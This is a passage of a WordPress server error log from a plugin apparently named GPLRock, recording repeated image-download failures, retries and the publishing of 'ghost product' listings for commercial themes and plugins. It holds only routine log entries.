https://meldwp.com/wp-content/uploads/rango--elegant-fashion-woocommerce-wordpress-theme-9753.webp [05-Apr-2026 12:03:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rango-elegant-fashion-woocommerce-wordpress-theme [05-Apr-2026 12:03:18 UTC] GPLRock: Image download failed for product mediko-health-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:20 UTC] GPLRock: Image download failed for product mediko-health-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mediko---health-medical-wordpress-theme-18256.webp for product mediko-health-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:03:23 UTC] GPLRock: Image download failed for product mediko-health-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:25 UTC] GPLRock: Image download failed for product mediko-health-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mediko---health-medical-wordpress-theme-18256.webp for product mediko-health-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:03:27 UTC] GPLRock WARNING: Image download failed for product mediko-health-medical-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mediko---health-medical-wordpress-theme-18256.webp [05-Apr-2026 12:03:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mediko-health-medical-wordpress-theme [05-Apr-2026 12:03:27 UTC] GPLRock: Image download failed for product digibit-bitcoin-trading-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:29 UTC] GPLRock: Image download failed for product digibit-bitcoin-trading-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/digibit---bitcoin-trading-wordpress-theme-25518.webp for product digibit-bitcoin-trading-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:03:31 UTC] GPLRock: Image download failed for product digibit-bitcoin-trading-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:33 UTC] GPLRock: Image download failed for product digibit-bitcoin-trading-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/digibit---bitcoin-trading-wordpress-theme-25518.webp for product digibit-bitcoin-trading-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:03:35 UTC] GPLRock WARNING: Image download failed for product digibit-bitcoin-trading-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/digibit---bitcoin-trading-wordpress-theme-25518.webp [05-Apr-2026 12:03:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: digibit-bitcoin-trading-wordpress-theme [05-Apr-2026 12:03:36 UTC] GPLRock: Image download failed for product plamen-tobacco-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:38 UTC] GPLRock: Image download failed for product plamen-tobacco-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/plamen---tobacco-store-wordpress-theme-28952.webp for product plamen-tobacco-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:03:40 UTC] GPLRock: Image download failed for product plamen-tobacco-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:42 UTC] GPLRock: Image download failed for product plamen-tobacco-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/plamen---tobacco-store-wordpress-theme-28952.webp for product plamen-tobacco-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:03:44 UTC] GPLRock WARNING: Image download failed for product plamen-tobacco-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/plamen---tobacco-store-wordpress-theme-28952.webp [05-Apr-2026 12:03:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: plamen-tobacco-store-wordpress-theme [05-Apr-2026 12:03:44 UTC] GPLRock: Image download failed for product blaine-the-multipurpose-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:46 UTC] GPLRock: Image download failed for product blaine-the-multipurpose-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blaine---the-multipurpose-portfolio-theme-1954.webp for product blaine-the-multipurpose-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:03:49 UTC] GPLRock: Image download failed for product blaine-the-multipurpose-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:51 UTC] GPLRock: Image download failed for product blaine-the-multipurpose-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blaine---the-multipurpose-portfolio-theme-1954.webp for product blaine-the-multipurpose-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:03:53 UTC] GPLRock WARNING: Image download failed for product blaine-the-multipurpose-portfolio-theme. URL: https://meldwp.com/wp-content/uploads/blaine---the-multipurpose-portfolio-theme-1954.webp [05-Apr-2026 12:03:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: blaine-the-multipurpose-portfolio-theme [05-Apr-2026 12:03:53 UTC] GPLRock: Image download failed for product gerow-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:55 UTC] GPLRock: Image download failed for product gerow-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gerow---business-consulting-wordpress-theme-8600.webp for product gerow-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:03:57 UTC] GPLRock: Image download failed for product gerow-business-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:03:59 UTC] GPLRock: Image download failed for product gerow-business-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:04:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gerow---business-consulting-wordpress-theme-8600.webp for product gerow-business-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:04:01 UTC] GPLRock WARNING: Image download failed for product gerow-business-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gerow---business-consulting-wordpress-theme-8600.webp [05-Apr-2026 12:04:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gerow-business-consulting-wordpress-theme [05-Apr-2026 12:04:29 UTC] GPLRock: Image downloaded successfully for product walmartomatic-walmart-affiliate-money-generator-plugin-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7560f49a.webp [05-Apr-2026 12:04:29 UTC] GPLRock: Using pre-downloaded image for product walmartomatic-walmart-affiliate-money-generator-plugin-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7560f49a.webp [05-Apr-2026 12:04:29 UTC] GPLRock: Ghost product published with image - Product ID: walmartomatic-walmart-affiliate-money-generator-plugin-for-wordpress [05-Apr-2026 12:04:29 UTC] GPLRock: Image downloaded successfully for product coming-soon-and-maintenance-mode-2 (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aa8c4b1f.webp [05-Apr-2026 12:04:29 UTC] GPLRock: Using pre-downloaded image for product coming-soon-and-maintenance-mode-2: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aa8c4b1f.webp [05-Apr-2026 12:04:29 UTC] GPLRock: Ghost product published with image - Product ID: coming-soon-and-maintenance-mode-2 [05-Apr-2026 12:04:29 UTC] GPLRock: Image downloaded successfully for product real-estate-apartment-manager (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fd82a2c9.webp [05-Apr-2026 12:04:29 UTC] GPLRock: Using pre-downloaded image for product real-estate-apartment-manager: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fd82a2c9.webp [05-Apr-2026 12:04:29 UTC] GPLRock: Ghost product published with image - Product ID: real-estate-apartment-manager [05-Apr-2026 12:04:30 UTC] GPLRock: Image download failed for product socialsider-universal-social-sidebar (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:04:32 UTC] GPLRock: Image download failed for product socialsider-universal-social-sidebar (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:04:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/socialsider---universal-social-sidebar-10541.webp for product socialsider-universal-social-sidebar after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:04:34 UTC] GPLRock: Image download failed for product socialsider-universal-social-sidebar (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:04:36 UTC] GPLRock: Image download failed for product socialsider-universal-social-sidebar (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:04:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/socialsider---universal-social-sidebar-10541.webp for product socialsider-universal-social-sidebar after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:04:38 UTC] GPLRock WARNING: Image download failed for product socialsider-universal-social-sidebar. URL: https://meldwp.com/wp-content/uploads/socialsider---universal-social-sidebar-10541.webp [05-Apr-2026 12:04:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: socialsider-universal-social-sidebar [05-Apr-2026 12:04:38 UTC] GPLRock: Image downloaded successfully for product live-preview-switch-bar-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3ace59df.webp [05-Apr-2026 12:04:38 UTC] GPLRock: Using pre-downloaded image for product live-preview-switch-bar-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3ace59df.webp [05-Apr-2026 12:04:38 UTC] GPLRock: Ghost product published with image - Product ID: live-preview-switch-bar-for-wordpress [05-Apr-2026 12:04:39 UTC] GPLRock: Image download failed for product visual-composer-vista-gallery (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:04:41 UTC] GPLRock: Image download failed for product visual-composer-vista-gallery (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:04:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/visual-composer---vista-gallery-16898.webp for product visual-composer-vista-gallery after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:04:43 UTC] GPLRock: Image download failed for product visual-composer-vista-gallery (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:04:45 UTC] GPLRock: Image download failed for product visual-composer-vista-gallery (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:04:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/visual-composer---vista-gallery-16898.webp for product visual-composer-vista-gallery after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:04:47 UTC] GPLRock WARNING: Image download failed for product visual-composer-vista-gallery. URL: https://meldwp.com/wp-content/uploads/visual-composer---vista-gallery-16898.webp [05-Apr-2026 12:04:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: visual-composer-vista-gallery [05-Apr-2026 12:04:47 UTC] GPLRock: Image download failed for product countdown-timer-plugin-for-wordpress-boost-conversions-and-drive-urgency (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:04:49 UTC] GPLRock: Image download failed for product countdown-timer-plugin-for-wordpress-boost-conversions-and-drive-urgency (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:04:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/countdown-timer-plugin-for-wordpress-boost-conversions-and-drive-urgency-28637.webp for product countdown-timer-plugin-for-wordpress-boost-conversions-and-drive-urgency after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:04:52 UTC] GPLRock: Image download failed for product countdown-timer-plugin-for-wordpress-boost-conversions-and-drive-urgency (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:04:54 UTC] GPLRock: Image download failed for product countdown-timer-plugin-for-wordpress-boost-conversions-and-drive-urgency (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:04:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/countdown-timer-plugin-for-wordpress-boost-conversions-and-drive-urgency-28637.webp for product countdown-timer-plugin-for-wordpress-boost-conversions-and-drive-urgency after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:04:56 UTC] GPLRock WARNING: Image download failed for product countdown-timer-plugin-for-wordpress-boost-conversions-and-drive-urgency. URL: https://meldwp.com/wp-content/uploads/countdown-timer-plugin-for-wordpress-boost-conversions-and-drive-urgency-28637.webp [05-Apr-2026 12:04:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: countdown-timer-plugin-for-wordpress-boost-conversions-and-drive-urgency [05-Apr-2026 12:04:56 UTC] GPLRock: Image download failed for product infinite-grid-pro-wordpress-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:04:58 UTC] GPLRock: Image download failed for product infinite-grid-pro-wordpress-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:05:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/infinite-grid-pro-wordpress--woocommerce-plugin-19661.webp for product infinite-grid-pro-wordpress-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:05:00 UTC] GPLRock: Image download failed for product infinite-grid-pro-wordpress-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:05:02 UTC] GPLRock: Image download failed for product infinite-grid-pro-wordpress-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:05:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/infinite-grid-pro-wordpress--woocommerce-plugin-19661.webp for product infinite-grid-pro-wordpress-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:05:04 UTC] GPLRock WARNING: Image download failed for product infinite-grid-pro-wordpress-woocommerce-plugin. URL: https://meldwp.com/wp-content/uploads/infinite-grid-pro-wordpress--woocommerce-plugin-19661.webp [05-Apr-2026 12:05:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: infinite-grid-pro-wordpress-woocommerce-plugin [05-Apr-2026 12:05:05 UTC] GPLRock: Image download failed for product advertisement-banner-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:05:07 UTC] GPLRock: Image download failed for product advertisement-banner-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:05:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advertisement-banner-addon-for-wpbakery-page-builder-15126.webp for product advertisement-banner-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:05:09 UTC] GPLRock: Image download failed for product advertisement-banner-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:05:11 UTC] GPLRock: Image download failed for product advertisement-banner-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:05:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advertisement-banner-addon-for-wpbakery-page-builder-15126.webp for product advertisement-banner-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:05:13 UTC] GPLRock WARNING: Image download failed for product advertisement-banner-addon-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/advertisement-banner-addon-for-wpbakery-page-builder-15126.webp [05-Apr-2026 12:05:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: advertisement-banner-addon-for-wpbakery-page-builder [05-Apr-2026 12:05:13 UTC] GPLRock: Image download failed for product image-comparison-before-and-after-slider-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:05:15 UTC] GPLRock: Image download failed for product image-comparison-before-and-after-slider-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:05:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/image-comparison---before-and-after-slider-for-woocommerce-26008.webp for product image-comparison-before-and-after-slider-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:05:18 UTC] GPLRock: Image download failed for product image-comparison-before-and-after-slider-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:05:20 UTC] GPLRock: Image download failed for product image-comparison-before-and-after-slider-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:05:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/image-comparison---before-and-after-slider-for-woocommerce-26008.webp for product image-comparison-before-and-after-slider-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:05:22 UTC] GPLRock WARNING: Image download failed for product image-comparison-before-and-after-slider-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/image-comparison---before-and-after-slider-for-woocommerce-26008.webp [05-Apr-2026 12:05:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: image-comparison-before-and-after-slider-for-woocommerce [05-Apr-2026 12:05:49 UTC] GPLRock: Image downloaded successfully for product soflyy-wp-all-import-pro-link-cloaking-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-01eb6a5d.jpg [05-Apr-2026 12:05:49 UTC] GPLRock: Using pre-downloaded image for product soflyy-wp-all-import-pro-link-cloaking-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-01eb6a5d.jpg [05-Apr-2026 12:05:49 UTC] GPLRock: Ghost product published with image - Product ID: soflyy-wp-all-import-pro-link-cloaking-addon [05-Apr-2026 12:05:50 UTC] GPLRock: Image downloaded successfully for product oceanwp-hooks (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e6e5c25a.jpg [05-Apr-2026 12:05:51 UTC] GPLRock: Using pre-downloaded image for product oceanwp-hooks: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e6e5c25a.jpg [05-Apr-2026 12:05:51 UTC] GPLRock: Ghost product published with image - Product ID: oceanwp-hooks [05-Apr-2026 12:05:52 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-stripe-payment-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5a3a7948.jpg [05-Apr-2026 12:05:52 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-stripe-payment-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5a3a7948.jpg [05-Apr-2026 12:05:52 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-stripe-payment-gateway [05-Apr-2026 12:05:53 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-amazon-s3 (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-571086a4.jpg [05-Apr-2026 12:05:53 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-amazon-s3: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-571086a4.jpg [05-Apr-2026 12:05:53 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-amazon-s3 [05-Apr-2026 12:05:54 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-all-access (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6ab10cb9.jpg [05-Apr-2026 12:05:54 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-all-access: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6ab10cb9.jpg [05-Apr-2026 12:05:54 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-all-access [05-Apr-2026 12:05:55 UTC] GPLRock: Image downloaded successfully for product facetwp-user-post-type (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-16217d35.jpg [05-Apr-2026 12:05:55 UTC] GPLRock: Using pre-downloaded image for product facetwp-user-post-type: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-16217d35.jpg [05-Apr-2026 12:05:55 UTC] GPLRock: Ghost product published with image - Product ID: facetwp-user-post-type [05-Apr-2026 12:05:56 UTC] GPLRock: Image downloaded successfully for product learndash-lms-2checkout-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-96851116.jpg [05-Apr-2026 12:05:56 UTC] GPLRock: Using pre-downloaded image for product learndash-lms-2checkout-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-96851116.jpg [05-Apr-2026 12:05:56 UTC] GPLRock: Ghost product published with image - Product ID: learndash-lms-2checkout-integration [05-Apr-2026 12:05:58 UTC] GPLRock: Image downloaded successfully for product give-mailchimp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9612f6d5.jpg [05-Apr-2026 12:05:58 UTC] GPLRock: Using pre-downloaded image for product give-mailchimp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9612f6d5.jpg [05-Apr-2026 12:05:58 UTC] GPLRock: Ghost product published with image - Product ID: give-mailchimp [05-Apr-2026 12:05:59 UTC] GPLRock: Image downloaded successfully for product gravityview-math (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-23b75c11.jpg [05-Apr-2026 12:05:59 UTC] GPLRock: Using pre-downloaded image for product gravityview-math: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-23b75c11.jpg [05-Apr-2026 12:05:59 UTC] GPLRock: Ghost product published with image - Product ID: gravityview-math [05-Apr-2026 12:06:00 UTC] GPLRock: Image downloaded successfully for product gravity-forms-square-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-331daf41.jpg [05-Apr-2026 12:06:00 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-square-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-331daf41.jpg [05-Apr-2026 12:06:00 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-square-add-on [05-Apr-2026 12:08:05 UTC] GPLRock: Image downloaded successfully for product popup-maker-remote-content (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5161fbde.jpg [05-Apr-2026 12:08:05 UTC] GPLRock: Using pre-downloaded image for product popup-maker-remote-content: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5161fbde.jpg [05-Apr-2026 12:08:05 UTC] GPLRock: Ghost product published with image - Product ID: popup-maker-remote-content [05-Apr-2026 12:08:07 UTC] GPLRock: Image downloaded successfully for product eventon-subscriber (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-23c04ed7.jpg [05-Apr-2026 12:08:07 UTC] GPLRock: Using pre-downloaded image for product eventon-subscriber: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-23c04ed7.jpg [05-Apr-2026 12:08:07 UTC] GPLRock: Ghost product published with image - Product ID: eventon-subscriber [05-Apr-2026 12:08:08 UTC] GPLRock: Image downloaded successfully for product wp-user-frontend-pro-personal (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3c57f48f.jpg [05-Apr-2026 12:08:08 UTC] GPLRock: Using pre-downloaded image for product wp-user-frontend-pro-personal: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3c57f48f.jpg [05-Apr-2026 12:08:08 UTC] GPLRock: Ghost product published with image - Product ID: wp-user-frontend-pro-personal [05-Apr-2026 12:08:10 UTC] GPLRock: Image downloaded successfully for product searchwp-wp-job-manager-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-679986a0.jpg [05-Apr-2026 12:08:10 UTC] GPLRock: Using pre-downloaded image for product searchwp-wp-job-manager-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-679986a0.jpg [05-Apr-2026 12:08:10 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-wp-job-manager-integration [05-Apr-2026 12:08:11 UTC] GPLRock: Image downloaded successfully for product themify-builder-slideshow (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ec982d03.jpg [05-Apr-2026 12:08:11 UTC] GPLRock: Using pre-downloaded image for product themify-builder-slideshow: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ec982d03.jpg [05-Apr-2026 12:08:11 UTC] GPLRock: Ghost product published with image - Product ID: themify-builder-slideshow [05-Apr-2026 12:08:13 UTC] GPLRock: Image downloaded successfully for product learndash-lms-grassblade-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-89de349a.jpg [05-Apr-2026 12:08:13 UTC] GPLRock: Using pre-downloaded image for product learndash-lms-grassblade-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-89de349a.jpg [05-Apr-2026 12:08:13 UTC] GPLRock: Ghost product published with image - Product ID: learndash-lms-grassblade-integration [05-Apr-2026 12:08:14 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-comments-plus (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cc879f75.jpg [05-Apr-2026 12:08:14 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-comments-plus: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cc879f75.jpg [05-Apr-2026 12:08:14 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-comments-plus [05-Apr-2026 12:08:16 UTC] GPLRock: Image downloaded successfully for product awesome-gallery-instagram-flickr-facebook-galleries-on-your-site (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6b0127d9.jpg [05-Apr-2026 12:08:16 UTC] GPLRock: Using pre-downloaded image for product awesome-gallery-instagram-flickr-facebook-galleries-on-your-site: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6b0127d9.jpg [05-Apr-2026 12:08:16 UTC] GPLRock: Ghost product published with image - Product ID: awesome-gallery-instagram-flickr-facebook-galleries-on-your-site [05-Apr-2026 12:08:18 UTC] GPLRock: Image downloaded successfully for product woocommerce-paypal-adaptive-payments (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9880a350.jpg [05-Apr-2026 12:08:18 UTC] GPLRock: Using pre-downloaded image for product woocommerce-paypal-adaptive-payments: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9880a350.jpg [05-Apr-2026 12:08:18 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-paypal-adaptive-payments [05-Apr-2026 12:18:26 UTC] GPLRock: Image download failed for product pimp-creative-multipurpose-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:18:28 UTC] GPLRock: Image download failed for product pimp-creative-multipurpose-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:18:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pimp---creative-multipurpose-theme-29867.webp for product pimp-creative-multipurpose-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:18:31 UTC] GPLRock: Image download failed for product pimp-creative-multipurpose-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:18:33 UTC] GPLRock: Image download failed for product 